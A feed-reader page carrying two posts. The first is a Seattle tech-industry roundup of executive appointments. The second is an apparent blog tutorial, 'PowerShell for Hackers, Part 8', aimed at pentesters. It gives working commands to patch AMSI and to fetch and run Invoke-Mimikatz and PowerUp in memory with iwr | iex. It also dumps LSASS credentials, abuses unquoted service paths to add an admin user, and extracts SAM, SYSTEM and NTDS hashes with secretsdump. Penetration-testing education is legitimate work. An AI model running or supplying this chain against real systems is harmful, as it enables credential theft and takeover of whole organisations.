Normal view

There are new articles available, click to refresh the page.
Today — 14 September 2026Main stream

Tech Moves: Microsoft, Amazon and Kestra promotions; Gradial names CMO; Yoodli adds VP

14 September 2026 at 10:56
Silvia Candiani. (LinkedIn Photo)

Silvia Candiani has been named corporate vice president of Worldwide Telco & Media within the Microsoft Frontier Company, a $2.5 billion initiative launched by the tech giant in July to embed engineers inside customers to build and run AI systems. In her new role, Candiani will lead Microsoft Frontier Company’s work with some of the largest telecommunications operators and media conglomerates.

“The momentum across our industry is extraordinary, and I believe we are only at the beginning of what AI can make possible,” said Candiani, who is based in Milan.

Before joining Microsoft in 2010 as a general manager, Candiani was a marketing director for Vodafone in Italy for more than a decade.

Kevin Frey. (LinkedIn Photo)

Kevin Frey has been appointed vice president and chief impact officer of Microsoft Elevate, the company’s philanthropic effort providing technology support, donations, sales and AI training for educational organizations and nonprofits. Frey joined from UNICEF, where he was the first CEO of Generation Unlimited, the organization’s skills and employment initiative.

Frey said he was joining Microsoft because it’s “one of the only organizations in the world with the scale, scope and influence to bend the arc of the AI-powered future we are entering.”

“I will be spending my time and energy trying to ensure that the benefits of AI are shared broadly and safely across society — by every teacher, every student and every worker — regardless of their postal code,” he added.

— And while we’re on Microsoft, Anne Linge has been promoted to director of communications for commercial and consumer experiences after nearly 10 years with the company. She previously worked in communications at Weber Shandwick and Waggener Edstrom Worldwide, which has since rebranded as We.

Alexis Bateman. (LinkedIn Photo)

Alexis Bateman has been promoted to director of global sustainability at Amazon Web Services after more than five years with the company. She was director of the MIT Center for Transportation & Logistics for 14 years before coming to Amazon.

Her work with AWS has given her the chance to help “shape sustainability at enormous scale,” Bateman said. “AI and cloud are transforming technology and society at an unprecedented pace, creating both enormous challenges and incredible opportunities for sustainability.”

Lynn Girotto. (LinkedIn Photo)

Gradial has appointed Lynn Girotto as chief marketing officer. In June, the Seattle startup announced $65 million in new funding for its agentic AI platform that automates enterprise marketing. The company is No. 127 on the GeekWire 200, a ranked index of the Pacific Northwest’s top startups.

Girotto joins from Qualtrics, where she was CMO for two years. She has previously led marketing teams at companies including Vimeo, Tableau and Getty Images, and was a senior director at Microsoft for nine years earlier in her career.

“The best marketers I know want to build ideas and customer relationships, not manage processes,” Girotto said. “Gradial is the first company I’ve seen that’s built to give them that time back.”

Kam Ghaffarian. (LinkedIn Photo)

— A Seattle-area nonprofit group known as the Fermi Explorer Mission announced that Kam Ghaffarian has joined as co-founder. Earlier this month, the organization shared its plans to send a spacecraft on an 80,000-year trip to the nearest alien star system, Alpha Centauri.

Ghaffarian is a billionaire who helped launch companies including X-energy, Axiom and Intuitive Machines. “By committing to launching a spacecraft to Alpha Centauri by 2029, we are not just pushing the boundaries of current technology; we are inspiring a new generation to look up and dream of interstellar exploration,” Ghaffarian said.

Philip Johnston, co-founder and CEO of the Fermi Explorer Mission, also leads Redmond, Wash.-based Starcloud, a startup aiming to launch up to 88,000 satellites to serve as AI data centers.

Rachel Cougan. (LinkedIn Photo)

Yoodli, the Seattle-based AI roleplay platform for enterprise training, has named Rachel Cougan vice president of human resources. Cougan previously served as a fractional HR leader through her consultancy, Possible HR. Before that, she was VP of people for Logixboard and Hiya, and also served as VP of talent for Textio.

Yoodli, which launched in 2021, has grown to more than 100 employees. The company is No. 17 on the GeekWire 200.

Daniel Finney. (LinkedIn Photo)

Kestra Medical Technologies has promoted Daniel Finney to vice president of research and development. The Kirkland, Wash.-based company sells cardiac monitoring and therapeutic devices. It raised $202 million in its IPO in March 2025 and was nominated for Deal of the Year at this year’s GeekWire Awards.

Finney has been with Kestra since 2019. CEO Brian Webster praised his role in developing the company’s FDA-approved monitoring device, adding that his “technical depth, product experience, and demonstrated leadership positions him to guide our next phase of innovation.”

Finney succeeds Phillip Foshee, Jr., who recently retired after leading Kestra’s R&D organization for nearly a decade.

PATH has named Dr. Jeremy Farrar chief of its Asia, Middle East and Europe regional division. Farrar, a globally recognized leader in public health and clinical medicine, will join PATH effective Oct. 1 and be based in Geneva. His past roles include assistant director-general at the World Health Organization and director of the Wellcome Trust.

PATH CEO Nikolaj Gilbert praised the appointment, and noted that Farrar “possesses deep knowledge of the realities that prevent access, the people that make health care possible, and the need for PATH’s mission of ensuring breakthrough innovations reach all who need them.”

Emily Levesque. (AAS Photo)

American Astronomical Society (AAS) announced that University of Washington scientist Emily Levesque is the next editor in chief of the AAS journals. She will succeed Ethan Vishniac, who is stepping down from the role at the end of summer 2027 after 12 years.

“In the writing and publishing landscape we’re facing today, sharing information has never been easier, but trusting information has never been harder — which makes the AAS journals’ combination of rigorous peer review and accessible science more valuable than ever,” Levesque said.

Levesque has been an assistant astronomy professor at the UW for 11 years. She leads the massive stars research group, which studies the evolution and death of the largest and “most extreme” stars in the universe.

— The Seattle Metropolitan Chamber has added eight members to its board of trustees:

  • Deniz Anders, Nordstrom’s executive vice president and chief marketing officer
  • Reuven Carlyle, founder of Earth Finance and former state senator
  • Carl Gipson, vice president of government and community affairs for Comcast
  • Trevor Gooby, executive vice president and chief operating officer for the Seattle Mariners
  • Daniel Huber, BNBuilders’ vice president of operations for the Northwest and Colorado
  • Karen Lee, CEO of Plymouth Housing
  • Holli Martinez, vice president, head of belonging, recognition and corporate responsibility for T-Mobile
  • Rajat Puri, executive vice president and chief operating officer for Premera Blue Cross

Before yesterdayMain stream

PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover

31 August 2026 at 13:56

Welcome back, pentesters!

For quite a while we’ve been covering different ways PowerShell can be used by hackers. You’ve learned about persistence, evasion, survival and the mayhem you can cause with PowerShell.

Today we’ll show you a basic workflow for interacting with a Windows system once you’ve gained some access. You’ll see privilege escalation, AMSI bypass and dumping credentials from a host. PowerShell can be used to exploit systems, even though it was never built for that purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that usually get done manually can be automated with the scripts. Let’s start by learning about AMSI.

AMSI Bypass

AMSI is the Antimalware Scan Interface. It’s a Windows feature that sits between script engines like PowerShell or Office macros and whatever AV/EDR product is installed on the machine. When you execute something, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script attacks and malware. Hackers are constantly looking for ways to keep that content from ever reaching AMSI  or to alter it so it won’t match detection rules.

You’ll see plenty of articles and tools claiming to bypass AMSI, but soon after they get released, Microsoft patches the vulnerability. That doesn’t mean these bypasses don’t exist. They certainly do and hackers use them, so it’s worth being familiar with this attack. Let’s test our system and try to patch AMSI.

First we need to check if the Defender is running on our target:

PS > Get-WmiObject -Class Win32_Service -Filter “Name=’WinDefend’”
checking if the defender is running on windows

And it is. If it was off, we wouldn’t need any AMSI bypass.

Patching AMSI

We need to patch AMSI using our script. Let’s download it:

PS > wget   https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1 -O shantanukhande-amsi.ps1

As you know by now, there are a few ways to execute scripts in PowerShell. We will use a simple one for demonstration purposes:

PS > .\shantanukhande-amsi.ps1
patching amsi with a powershell script

If your output matches ours, then AMSI has been successfully patched. From now on, Defender doesn’t have access to your PowerShell sessions and anything can be executed in it. 

It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.

Dumping Credentials with Mimikatz

Since you can run whatever you want now, let’s use Mimikatz to grab credentials. We’ll run it in memory without ever letting it touch disk. The command below can be paired with the AMSI script to keep it off the disk entirely.

Note that we are using Invoke-Mimikatz.ps1 by g4uss47 and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we don’t recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, let’s dump LSASS locally and see what’s there in the results:

PS > iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex  

PS > Invoke-Mimikatz -DumpCreds
dumping lsass with mimikatz powershell script Invoke-Mimikatz.ps1

Now we have the credentials of a brand manager. If we compromised a more valuable system in the domain, like a server or a database, we could expect domain admin credentials. You’ll see this quite often.

Privilege Escalation with PowerUp

Privilege escalation is a complex topic. Sometimes systems are misconfigured and regular users end up with admin privileges on them, so you won’t need to bother much here. That can let you skip privilege escalation entirely and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors for privilege escalation, but among the most common are unquoted service paths and insecure file permissions. Insecure file permissions can be abused easily by just swapping in a malicious file with the same name as the legitimate one, but unquoted service paths take more work for a beginner. That’s why we’ll cover this attack today with the help of PowerUp. Before we get into it, it’s worth mentioning that this script has been known to security products for a long time, so be careful.

Finding Vulnerable Services

Unquoted Service Path is a configuration mistake in Windows services, where the full path to the service executable has spaces in it but isn’t wrapped in quotation marks. Since Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can get interpreted ambiguously. The system might search for an executable at C:\Program.exe or C:\Program Files\My.exe before it ever reaches the intended service.exe. A hacker can drop their own executable at one of those earlier locations and the system will run that instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.

Let’s run PowerUp and find vulnerable services:

PS > iwr https://raw.githubcontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex  

PS > Get-UnquotedService  
listing vulnerable unquoted services to privilege escalation

Now let’s test the service names and see which one will get us local admin privileges:

PS > Invoke-ServiceAbuse -Name 'Service Name'

If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.

PS > net user john
abusing an unqouted service with the help of PowerUp.ps1

Now we have an admin user on this machine, which can be used for various purposes.

Attacking NTDS and SAM

With enough privileges, we can dump NTDS and SAM without having to deal with security products at all, just using native Windows functions. These attacks usually take multiple commands, since dumping only NTDS or only a SAM hive doesn’t get you anywhere on its own. That’s why we added a new script to our repository. It automatically identifies what kind of host you’re running it on and dumps the files you need. NTDS only exists on Domain Controllers and holds the credentials of every Active Directory user, so you won’t find this file on regular machines. Regular machines get exploited instead by dumping their SAM and SYSTEM hives. Below you can see how it works.

Attacking SAM on Domain Machines

To avoid issues, bypass the execution policy:

PS > powershell -ep bypass

Then we execute the script to dump SAM and SYSTEM hives:

PS > wget https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper -O ntds.ps1

PS > .\ntds.ps1

# or in memory only
PS > iwr https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper | iex
dumping sam and system hives with ntds.ps1

listing sam and system hive dumps

Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.

Next we need to exfiltrate these files and extract the credentials:

kali > secretsdump.py -sam SAM -system SYSTEM LOCAL
extracting creds from sam hive

Attacking NTDS on Domain Controllers

If you’ve already compromised a domain admin or managed to escalate your privileges on the Domain Controller, you might want to grab the credentials of every user in the company.

We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. You can load scripts into Evil-WinRM straight from your machine so they execute on the target without ever touching disk. It can also patch AMSI, but be really careful with that.

Connect to the DC:

kali > evil-winrm -i DC -u admin -p password -s ‘/home/user/scripts/’

Now you can execute your scripts:

PS > ntds.ps1
dumping NTDS with ntds.ps1 script

Evil-WinRM has a download command to save them. Then run this command:

kali > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL
extracting creds from the ntds dump

Summary

PowerShell can also be used for privilege escalation and complete domain compromise. We showed you a few steps where each builds on the previous one. Hackers can chain these small misconfigurations to take over an organization. 

Want to become a Powershell expert? Join our Powershell for Hackers training.

The post PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover first appeared on Hackers Arise.

❌
❌